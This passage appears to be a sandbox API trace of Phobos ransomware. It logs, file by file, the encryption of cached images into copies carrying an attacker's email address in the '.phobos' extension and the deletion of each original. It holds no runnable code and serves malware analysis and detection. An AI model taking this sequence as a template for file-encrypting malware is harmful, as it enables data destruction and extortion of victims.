Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.844] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.844] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.845] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.845] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.845] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6d0, lpOverlapped=0x0) returned 1 [0175.995] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6e0, dwBufLen=0x6e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6e0) returned 1 [0175.995] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6e0, lpOverlapped=0x0) returned 1 [0175.996] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0175.996] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.996] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.996] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.996] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.996] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.996] CloseHandle (hObject=0x158) returned 1 [0175.996] CloseHandle (hObject=0x190) returned 1 [0175.996] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg")) returned 1 [0175.997] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.999] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1671) returned 1 [0175.999] CloseHandle (hObject=0x190) returned 1 [0175.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg")) returned 0x2020 [0175.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.999] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.999] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0176.000] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.000] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x687, lpOverlapped=0x0) returned 1 [0176.010] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x690, dwBufLen=0x690 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x690) returned 1 [0176.010] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x690, lpOverlapped=0x0) returned 1 [0176.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0176.012] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.012] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.012] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.012] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.012] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.012] CloseHandle (hObject=0x190) returned 1 [0176.012] CloseHandle (hObject=0x158) returned 1 [0176.012] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedxjj[1].jpg")) returned 1 [0176.013] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.014] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9416) returned 1 [0176.014] CloseHandle (hObject=0x158) returned 1 [0176.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg")) returned 0x2020 [0176.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0176.015] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.015] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x24c8, lpOverlapped=0x0) returned 1 [0176.169] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x24d0, dwBufLen=0x24d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x24d0) returned 1 [0176.169] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x24d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x24d0, lpOverlapped=0x0) returned 1 [0176.170] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0176.170] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.170] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.170] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.171] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.171] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.171] CloseHandle (hObject=0x158) returned 1 [0176.171] CloseHandle (hObject=0x190) returned 1 [0176.171] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeep0k[1].jpg")) returned 1 [0176.172] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.173] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3083) returned 1 [0176.173] CloseHandle (hObject=0x190) returned 1 [0176.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg")) returned 0x2020 [0176.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.173] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.173] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0176.175] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.175] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc0b, lpOverlapped=0x0) returned 1 [0176.211] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc10, dwBufLen=0xc10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc10) returned 1 [0176.211] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc10, lpOverlapped=0x0) returned 1 [0176.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0176.212] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.212] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.212] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.212] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.212] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.212] CloseHandle (hObject=0x190) returned 1 [0176.212] CloseHandle (hObject=0x158) returned 1 [0176.212] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefe6e[1].jpg")) returned 1 [0176.213] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.219] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7950) returned 1 [0176.219] CloseHandle (hObject=0x158) returned 1 [0176.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg")) returned 0x2020 [0176.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.220] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.220] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0176.220] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.220] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1f0e, lpOverlapped=0x0) returned 1 [0176.247] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f10, dwBufLen=0x1f10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f10) returned 1 [0176.247] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1f10, lpOverlapped=0x0) returned 1 [0176.248] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0176.248] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, 